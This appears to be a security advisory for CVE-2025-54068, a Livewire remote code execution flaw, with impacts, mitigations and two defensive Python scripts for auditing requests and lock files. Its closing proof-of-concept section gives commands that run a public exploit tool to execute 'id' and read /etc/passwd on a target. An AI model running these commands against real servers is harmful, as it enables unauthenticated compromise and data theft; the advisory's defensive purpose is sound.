CVE-2025-54068 – Livewire Component Property Hydration RCE

Vulnerable Version

Livewire 3.x < 3.6.4

Fixed Version

Livewire v3.6.4

Base Score

9.2 (Critical)

Vendor Description:-

Livewire is a full-stack framework for Laravel that lets developers build dynamic, reactive user interfaces with server-side rendering. By managing state and events on the backend, it enables interactive features without requiring much JavaScript. Development is quicker and easier to maintain because of Livewire's seamless integration with Blade templates. It is particularly helpful for building modern, responsive web apps without frontend complexity.

CVE-2025-54068 Description:-

The root cause of CVE-2025-54068 is an insecure implementation of the hydrateForUpdate method in Livewire v3's Livewire\Mechanisms\HandleComponents\HandleComponents class: it passes untrusted client-side property updates directly to the standard hydrate function without adequate validation or sanitization. Hydration reconstructs server-side component properties from client state on every request, so this let attackers supply malicious payloads during that process. Specially constructed nested property manipulations, or updates to properties that had been removed, could bypass the framework's safeguards and lead to arbitrary PHP code injection (classified as CWE-94). In particular, because unsafe property structures were not restricted, attacker-controlled data could be interpreted as executable code in a deserialization-like manner, regardless of authentication or the APP_KEY checksum verification.
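The description above turns on the shape of a Livewire update request: each component arrives with a snapshot (the server-issued JSON containing the declared property data, memo and checksum) plus an updates map of property paths to new values, and the two are only loosely reconciled. The following audit script, added here as an example and not taken from the advisory or from the Livewire project, parses a constructed update body and flags the two patterns the description names: updates addressed to properties the snapshot never declared (removed properties) and nested paths under properties the snapshot holds as scalars. The wire format (snapshot, updates, memo.name) is assumed from Livewire v3's /livewire/update endpoint; the request body and component names are constructed. It is meant as a starting point for the log monitoring a defender would run over captured request bodies, not as a replacement for upgrading.

```python
import json

# Constructed sample of a Livewire v3 update request body. The structure
# (components -> snapshot JSON string + updates map) is an assumption about
# the /livewire/update wire format; values and component names are made up.
SAMPLE_REQUEST = {
    "_token": "csrf-token-placeholder",
    "components": [
        {
            # A benign update: both paths target declared properties and the
            # nested path sits under an array-valued property.
            "snapshot": json.dumps({
                "data": {"count": 1, "form": [{"name": "alice"}, {"s": "arr"}]},
                "memo": {"id": "abc123", "name": "counter"},
                "checksum": "checksum-placeholder",
            }),
            "updates": {"count": 2, "form.name": "bob"},
            "calls": [],
        },
        {
            # A suspicious update: a nested path under a scalar property and an
            # update to a property the snapshot never declared.
            "snapshot": json.dumps({
                "data": {"title": "hello"},
                "memo": {"id": "def456", "name": "post-editor"},
                "checksum": "checksum-placeholder",
            }),
            "updates": {"title.0": "x", "ghost": 1},
            "calls": [],
        },
    ],
}


def audit_component(component: dict) -> list[str]:
    """Return human-readable findings for one component's update map."""
    findings: list[str] = []
    try:
        snapshot = json.loads(component.get("snapshot", ""))
    except (TypeError, ValueError):
        return ["<unparseable snapshot>: snapshot is not valid JSON"]

    declared = snapshot.get("data", {}) or {}
    name = snapshot.get("memo", {}).get("name", "<unknown>")

    for path in component.get("updates", {}):
        root, _, rest = path.partition(".")
        if root not in declared:
            # The client is updating a property the server never issued.
            findings.append(f"{name}: update to undeclared property '{path}'")
        elif rest and not isinstance(declared[root], (dict, list)):
            # A dotted path implies nesting, but the snapshot holds a scalar.
            findings.append(f"{name}: nested update '{path}' on scalar property '{root}'")
    return findings


def audit_request(body: dict) -> list[str]:
    """Audit every component in an update request body; empty list means clean."""
    findings: list[str] = []
    for component in body.get("components", []):
        findings.extend(audit_component(component))
    return findings


if __name__ == "__main__":
    for line in audit_request(SAMPLE_REQUEST) or ["no anomalous updates found"]:
        print(line)
```

Run it against request bodies captured from a reverse proxy or application log; a non-empty result is a reason to look at the source IP and the component named in the finding, and the checks are cheap enough to run inline on every /livewire/update request.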

Impacts

  • Enables unauthenticated remote code execution, allowing full server compromise.
  • Permits reading sensitive files such as configuration or user data.
  • Allows attackers to modify application logic or database contents.
  • Facilitates system disruption, website defacement, or service downtime.
  • Serves as a pivot for lateral movement in multi-tenant environments.

Mitigations

  • Upgrade Livewire to version 3.6.4 or later immediately.
  • Audit all Livewire components for vulnerable public configurations.
  • Implement network segmentation to limit exposure.
  • Monitor logs for unusual property update patterns or RCE indicators.
  • Temporarily disable exposed Livewire components if the upgrade is delayed.
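The first mitigation is a version check, and the quickest place to answer "are we affected?" across many Laravel deployments is composer.lock. The script below is an added example (not from the advisory or the Livewire project) that reads a lock file, finds the livewire/livewire entry, and compares it against the fixed version stated above; the affected range is taken from this page (3.x below 3.6.4), and the lock-file excerpt is constructed.

```python
import json
import re
import sys

# Fixed release according to the advisory: Livewire 3.x below this is affected.
FIXED_VERSION = (3, 6, 4)

# Constructed composer.lock excerpt for demonstration; not a real project's file.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v11.0.0"},
        {"name": "livewire/livewire", "version": "v3.5.1"},
    ],
    "packages-dev": [],
})


def parse_version(version: str) -> tuple[int, ...]:
    """Turn 'v3.6.4', '3.6.4' or '3.6.4-beta.1' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_vulnerable_version(version: str) -> bool:
    """True only for 3.x releases older than the fixed version."""
    parsed = parse_version(version)
    return parsed[0] == 3 and parsed < FIXED_VERSION


def livewire_version(lock_text: str):
    """Return the locked livewire/livewire version string, or None if it is not installed."""
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == "livewire/livewire":
                return pkg.get("version")
    return None


def is_vulnerable(lock_text: str):
    """True if an affected Livewire is locked, False if not affected, None if Livewire is absent."""
    version = livewire_version(lock_text)
    if version is None:
        return None
    return is_vulnerable_version(version)


if __name__ == "__main__":
    # Usage: python check_livewire.py [path/to/composer.lock]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCK
    verdict = is_vulnerable(text)
    if verdict is None:
        print("livewire/livewire not present in lock file")
    else:
        print(f"livewire/livewire {livewire_version(text)}: "
              + ("AFFECTED, upgrade to 3.6.4 or later" if verdict else "not affected"))
```

Only the lock file is consulted because that is what was actually deployed; a loose constraint in composer.json says nothing about which release is running.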

POC

Install the requirements after cloning the repository:

git clone https://github.com/synacktiv/Livepyre.git
cd Livepyre
pip install -r requirements.txt

Next, use the exploit against the target. Without needing the APP_KEY, the tool will automatically identify the Livewire version, locate accessible snapshots, and attempt to exploit the vulnerability:

python Livepyre.py -u http://your-ip:8080/ -f system -p "id"

The tool will check the snapshot for parameters with object types. If any are found, it triggers RCE directly; otherwise it attempts to brute-force the parameters. You can also execute other commands, such as reading /etc/passwd:

python Livepyre.py -u http://your-ip:8080/ -f system -p "cat /etc/passwd"
